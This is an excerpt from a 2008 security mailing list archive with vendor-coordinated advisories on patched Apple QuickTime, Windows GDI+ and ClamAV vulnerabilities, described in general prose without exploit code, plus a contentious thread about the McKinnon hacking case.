to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 22:56:49 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 16:56:49 -0500 Subject: [Full-disclosure] ZDI-08-058: Apple QuickTime Panorama PDAT Atom Parsing Buffer Overflow Vulnerability Message-ID: <OF82B48569.15399D7C-ON882574BF.00782211-862574BF.00788F54@3com.com> ZDI-08-058: Apple QuickTime Panorama PDAT Atom Parsing Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-058 September 9, 2008 -- CVE ID: CVE-2008-3625 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6242. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the handling of panorama track PDAT atoms. When the maxTilt, minFieldOfView and maxFieldOfView elements are corrupted, a stack buffer overflow occurs which can be further leveraged to execute arbitrary code under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-06-25 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 22:59:52 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 16:59:52 -0500 Subject: [Full-disclosure] ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption Vulnerability Message-ID: <OFC2D01104.B63ECC2D-ON882574BF.00781CF0-862574BF.0078D6B4@3com.com> ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-062 September 9, 2008 -- CVE ID: CVE-2008-3627 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the parsing of mov video files in QuickTimeH264.scalar. A maliciously crafted MDAT atom can cause a heap corruption resulting in the execution of arbitrary code under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-05-19 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Subreption LLC -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 22:56:07 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 16:56:07 -0500 Subject: [Full-disclosure] ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow Vulnerability Message-ID: <OF1E914E95.7EA452D1-ON882574BF.00782298-862574BF.00787EAA@3com.com> ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-057 September 9, 2008 -- CVE ID: CVE-2008-3635 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of QuickTime files that utilize the Indeo video codec. A lack of proper bounds checking within QuickTimeInternetExtras.qtx can result in a stack based buffer overflow leading to arbitrary code execution under the context of the currently logged in user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-08-19 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 22:59:17 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 16:59:17 -0500 Subject: [Full-disclosure] ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption Vulnerability Message-ID: <OFF44078F7.DFCE0D2D-ON882574BF.00782062-862574BF.0078C8D3@3com.com> ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-061 September 9, 2008 -- CVE ID: CVE-2008-3627 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the parsing of MP4 video files in QuickTimeH264.qtx. A maliciously crafted MDAT atom can cause a heap corruption resulting in the execution of arbitrary code. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-05-13 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 22:57:34 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 16:57:34 -0500 Subject: [Full-disclosure] ZDI-08-059: Apple QuickTime STSZ Atom Parsing Heap Corruption Vulnerability Message-ID: <OF5E205B69.A7D117EE-ON882574BF.0078218D-862574BF.0078A0A7@3com.com> ZDI-08-059: Apple QuickTime STSZ Atom Parsing Heap Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-059 September 9, 2008 -- CVE ID: CVE-2008-3626 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6148. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the handling of STSZ atoms within the function CallComponentFunctionWithStorage(). When an entry in the sample_size_table is too large, a memory corruption occurs which can be further leveraged to execute arbitrary code under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-05-15 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From labs-no-reply at idefense.com Wed Sep 10 01:38:46 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Tue, 09 Sep 2008 19:38:46 -0500 Subject: [Full-disclosure] iDefense Security Advisory 09.09.08: Apple QuickTime PICT Integer Overflow Vulnerability Message-ID: <48C71716.9040407@idefense.com> iDefense Security Advisory 09.09.08 http://labs.idefense.com/intelligence/vulnerabilities/ Sep 09, 2008 I. BACKGROUND Quicktime is Apple's media player product, and is used to render video and other media. The PICT file format was developed by Apple Inc. in 1984. PICT files can contain both object oriented images and bitmaps. For more information visit the vendor's web site at the following URL. http://www.apple.com/quicktime/ II. DESCRIPTION Remote exploitation of an integer overflow in Apple Inc.'s QuickTime could allow an attacker to execute arbitrary code in the security context of the current user. QuickTime is vulnerable to an integer overflow vulnerability when handling malformed PICT files. This issue results in heap corruption which can lead to arbitrary code execution. III. ANALYSIS Exploitation of this issue results in arbitrary code execution in the security context of the current user. An attacker would need to host a web page containing a malformed PICT file. Upon visiting the malicious web page exploitation would occur. Alternatively a malicious PICT file could be attached to an e-mail. IV. DETECTION Apple Inc.'s QuickTime versions 7.4.5 and 7.4 have been confirmed to be vulnerable to this issue. Older versions are also suspected to be vulnerable. V. WORKAROUND iDefense recommends disabling the QuickTime Plug-in and altering the .pic and .pict file type associations within the registry. Disabling the plug-in will prevent web browsers from utilizing QuickTime Player to view associated media files. Removing the file type associations within the registry will prevent QuickTime Player and Picture Viewer from opening .pic and .pict files. VI. VENDOR RESPONSE Apple has released QuickTime 7.5.5 which resolves this issue. More information is available via Apple's QuickTime Security Update page at the URL shown below. http://support.apple.com/kb/HT3027 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3614 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/13/2008 Initial vendor notification 05/22/2008 Initial vendor response 09/09/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Wed Sep 10 01:27:32 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Tue, 09 Sep 2008 19:27:32 -0500 Subject: [Full-disclosure] iDefense Security Advisory 09.09.08: Microsoft Windows GDI+ Gradient Fill Heap Overflow Vulnerability Message-ID: <48C71474.6030404@idefense.com> iDefense Security Advisory 09.09.08 http://labs.idefense.com/intelligence/vulnerabilities/ Sep 09, 2008 I. BACKGROUND The GDI+ library, or "GdiPlus.dll", provides access to a number of graphics methods, via a class-based API. Vector Markup Language (VML) is a component of the Extensible Markup Language (XML) that specifies vector images (e.g., rectangles and ovals) using the GDI+ API. For more information about these technologies, visit the following URLs. http://msdn.microsoft.com/en-us/library/ms533797(VS.85).aspx http://msdn.microsoft.com/en-us/library/ms533798(VS.85).aspx http://www.w3.org/TR/1998/NOTE-VML-19980513 http://en.wikipedia.org/wiki/Vector_Markup_Language II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in multiple versions of Microsoft Corp.'s GDI+ could allow an attacker to execute arbitrary code within the context of the local user. The vulnerability specifically exists in the memory allocation performed by the GDI+ library. Certain malformed gradient fill input can cause the application to corrupt the heap, potentially allowing arbitrary code execution. III. ANALYSIS Exploitation of this vulnerability may allow an attacker to execute arbitrary code in the context of the current user. To exploit this vulnerability, the attacker would need to convince a targeted user to render a document with an application that utilizes the vulnerable GDI+ functions. This could be accomplished by persuading the user to follow a link, view a document, or read an e-mail message. IV. DETECTION iDefense Labs confirmed this vulnerability affects Internet Explorer 7 and Internet Explorer 6 on the Microsoft Windows XP SP2 platform. The following versions of VGX.DLL were tested and found to be vulnerable: 7.00.6000.20628 7.00.6000.16386 6.00.2900.3051 6.00.2900.2997 While the VGX.DLL library (which handles VML) appears to be the most likely vector, Microsoft have indicated to us that the GdiPlus.dll is the root cause of the vulnerability. Version 5.1.3102.2180 of GdiPlus.dll was installed on each of the tested systems. V. WORKAROUND In order to prevent exploitation of this vulnerability, unregister or deny access to vgx.dll and/or gdiplus.dll. Note that doing so will prevent proper rendering of documents that rely on the affected component. VI. VENDOR RESPONSE Microsoft has officially addressed this vulnerability with Security Bulletin MS08-052. For more information, consult their bulletin at the following URL. http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-5348 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/09/2007 Initial vendor notification 05/09/2007 Initial vendor response 09/09/2008 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by Greg MacManus during his tenure with iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From xploitable at gmail.com Wed Sep 10 04:02:02 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 10 Sep 2008 04:02:02 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <21600.1220886960@turing-police.cc.vt.edu> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <21600.1220886960@turing-police.cc.vt.edu> Message-ID: <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com> On Mon, Sep 8, 2008 at 4:16 PM, <Valdis.Kletnieks at vt.edu> wrote: > For the record, although any single hacking case probably isn't the President's > job, unless it's a highly visible one like the McKinnon case, the question of > what policies/directives should be issued to deal with the general question > *is* the President's job. > I'm talking about artificially ramping up something and giving a false impression to a president just so you can get power and money should be illegal. What Marcus Sachs said in the Youtube video sounds illegal. He wants to ramp up cyber security to make it something a president should worry about, even though in its natural state he knows it isn't one. Would that not come under some kind of fraud, to cheat and lie to a president to get money from him for something that doesn't actually need money for in its natural state. Why should we let Marcus Sachs get away with it, when the evidence is on Youtube. Why don't the security community show the next administration the Youtube video, and then Marcus Sachs would have no chance of getting anything, because they will realise he is just lying and cheating, and ramping up cyber security to be something that it isn't. All the best, n3td3v -- https://groups.google.com/group/n3td3v From yahoo at jimpop.com Wed Sep 10 05:21:33 2008 From: yahoo at jimpop.com (Jim Popovitch) Date: Wed, 10 Sep 2008 00:21:33 -0400 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <21600.1220886960@turing-police.cc.vt.edu> <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com> Message-ID: <7ff145960809092121la2d567ey6bd109865e869d43@mail.gmail.com> On Tue, Sep 9, 2008 at 23:02, n3td3v <xploitable at gmail.com> wrote: > I'm talking about artificially ramping up something and giving a false > impression... You are talking/writing about two different things. Ramping up something is different than falsely describing about ramping up something. I watched the video, I did not get the impression that Marcus was speaking about creating a falsehood. -Jim P. From xploitable at gmail.com Wed Sep 10 05:52:27 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 10 Sep 2008 05:52:27 +0100 Subject: [Full-disclosure] [funsec] Internet attacks against Georgian web s ites In-Reply-To: <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com> References: <20080818090256.4DD352003D@mailserver7.hushmail.com> <8f1f7b60808180543w18ce6ddasb2944db0a3298533@mail.gmail.com> <11005.1219073952@turing-police.cc.vt.edu> <1219077827.8558.51.camel@hextic-desktop> <48A9B2CA.4010602@fred.net> <1219090531.6511.0.camel@hextic-desktop> <4b6ee9310808281233x6132b469i1f9d035d25eb3639@mail.gmail.com> <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com> <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com> Message-ID: <4b6ee9310809092152m309e733fh14e195c357b31f0b@mail.gmail.com> On Mon, Sep 8, 2008 at 2:41 AM, Ureleet <ureleet at gmail.com> wrote: > drink yourself to death. thank you. > Bush was an alcoholic as well but that didn't stop him becoming president. Its just a shame that somebody lied to him and that Iraq happened. Don't lie to a president based on a false pretence!!! Maybe Marcus Sachs is listening and won't lie to a president about cyber security either. All the best, n3td3v > On Thu, Aug 28, 2008 at 3:42 PM, n3td3v <xploitable at gmail.com> wrote: >> On Thu, Aug 28, 2008 at 8:33 PM, n3td3v <xploitable at gmail.com> wrote: >>> Putin blames US for Georgia role >>> >>> Russian Prime Minister Vladimir Putin has accused the US of provoking >>> the conflict in Georgia, possibly for domestic election purposes. >>> >>> Mr Putin told CNN US citizens were "in the area" during the conflict >>> over South Ossetia and were "taking direct orders from their leaders". >>> >>> He said his defence officials had told him the provocation was to >>> benefit one of the US presidential candidates. >>> >>> The White House dismissed the allegations as "not rational". >>> >>> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm >>> >> >> "The suspicion arises that someone in the United States especially >> created this conflict with the aim of making the situation more tense >> and creating a competitive advantage for one of the candidates >> fighting for the post of US president." >> >> White House spokeswoman Dana Perino rejected the allegation. >> >> "To suggest that the United States orchestrated this on behalf of a >> political candidate - it sounds not rational," she said. >> >> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > From security at mandriva.com Wed Sep 10 06:04:01 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 09 Sep 2008 23:04:01 -0600 Subject: [Full-disclosure] [ MDVSA-2008:189 ] clamav Message-ID: <E1KdHs1-0007XU-KE@titan.mandriva.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:189 http://www.mandriva.com/security/ _______________________________________________________________________ Package : clamav Date : September 9, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities were discovered in ClamAV and corrected with the 0.94 release, including: A vulnerability in ClamAV's chm-parser allowed remote attackers to cause a denial of service (application crash) via a malformed CHM file (CVE-2008-1389). A vulnerability in libclamav would allow attackers to cause a denial of service via vectors related to an out-of-memory condition (CVE-2008-3912). Multiple memory leaks were found in ClamAV that could possibly allow attackers to cause a denial of service via excessive memory consumption (CVE-2008-3913). A number of unspecified vulnerabilities in ClamAV were reported that have an unknown impact and attack vectors related to file descriptor leaks (CVE-2008-3914). Other bugs have also been corrected in 0.94 which is being provided with this update. Because this new version has increased the major of the libclamav library, updated dependent packages are also being provided. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3912 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3913 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3914 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 5a59d6fe5e4fc3dfeffa930bf1bfbade 2007.1/i586/clamav-0.94-1.1mdv2007.1.i586.rpm 6699ae8d7a278a4546bd16b8edd92b80 2007.1/i586/clamav-db-0.94-1.1mdv2007.1.i586.rpm 369affe714278781d07748aa9aa3282d 2007.1/i586/clamav-milter-0.94-1.1mdv2007.1.i586.rpm a34884b3416c7039bfe0307329a75469 2007.1/i586/clamd-0.94-1.1mdv2007.1.i586.rpm 326099a42cc04963de5a4e6c32d9295e 2007.1/i586/klamav-0.44-1.1mdv2007.1.i586.rpm 3dac3a08b8077d6367ca22bf9b8b5731 2007.1/i586/libclamav5-0.94-1.1mdv2007.1.i586.rpm 329b46ef055ea610b9baa0a364cce0b0 2007.1/i586/libclamav-devel-0.94-1.1mdv2007.1.i586.rpm 685aea74c200241fdf8ef9fc6f4e4e7b 2007.1/SRPMS/clamav-0.94-1.1mdv2007.1.src.rpm 25b939eb3abfe70374edf4f314f7d2bc 2007.1/SRPMS/klamav-0.44-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 19b119eeae8187c820a56681ec003bd2 2007.1/x86_64/clamav-0.94-1.1mdv2007.1.x86_64.rpm 44f1c6f2729a154a4d5b92b9b0185b37 2007.1/x86_64/clamav-db-0.94-1.1mdv2007.1.x86_64.rpm c4a07f4bd14120db422b196f32c491fe 2007.1/x86_64/clamav-milter-0.94-1.1mdv2007.1.x86_64.rpm 4ac4af22079d824c87f83224bb0a5e0a 2007.1/x86_64/clamd-0.94-1.1mdv2007.1.x86_64.rpm 577fa90a30d5b2f47fbd730bf6abcd1f 2007.1/x86_64/klamav-0.44-1.1mdv2007.1.x86_64.rpm 7bcfa45a9c5b60eb9a1a6eac3a9e475c 2007.1/x86_64/lib64clamav5-0.94-1.1mdv2007.1.x86_64.rpm f2aaa85f2e0504a380dec20f644efecc 2007.1/x86_64/lib64clamav-devel-0.94-1.1mdv2007.1.x86_64.rpm 685aea74c200241fdf8ef9fc6f4e4e7b 2007.1/SRPMS/clamav-0.94-1.1mdv2007.1.src.rpm 25b939eb3abfe70374edf4f314f7d2bc 2007.1/SRPMS/klamav-0.44-1.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 07c42704f9eb9c8030f801f229304b3e 2008.0/i586/clamav-0.94-1.1mdv2008.0.i586.rpm 5103d15263284af283399e0eeb71296a 2008.0/i586/clamav-db-0.94-1.1mdv2008.0.i586.rpm 2cf2f1d21d5428c8a26a80d6a70e8a34 2008.0/i586/clamav-milter-0.94-1.1mdv2008.0.i586.rpm fc53823cb1b73eb75c008a3ebc21193a 2008.0/i586/clamd-0.94-1.1mdv2008.0.i586.rpm 67b1edd4b40dbc10e3594e79a9016f0e 2008.0/i586/klamav-0.44-1.1mdv2008.0.i586.rpm 779bd44fb23ab3d7c38a0ebef3382938 2008.0/i586/libclamav5-0.94-1.1mdv2008.0.i586.rpm 2ec3fb577dc1da56af0481f197e2000d 2008.0/i586/libclamav-devel-0.94-1.1mdv2008.0.i586.rpm fff2dc6701ea1a7e458e0c7305d7c4b4 2008.0/SRPMS/clamav-0.94-1.1mdv2008.0.src.rpm 790d1fafeb9d594a4ef8b0815f3262b2 2008.0/SRPMS/klamav-0.44-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 19a38a3e0dd4b8110978001c9e00983c 2008.0/x86_64/clamav-0.94-1.1mdv2008.0.x86_64.rpm 7d656ec44f2bb5ff2b0fec6bafa7df70 2008.0/x86_64/clamav-db-0.94-1.1mdv2008.0.x86_64.rpm 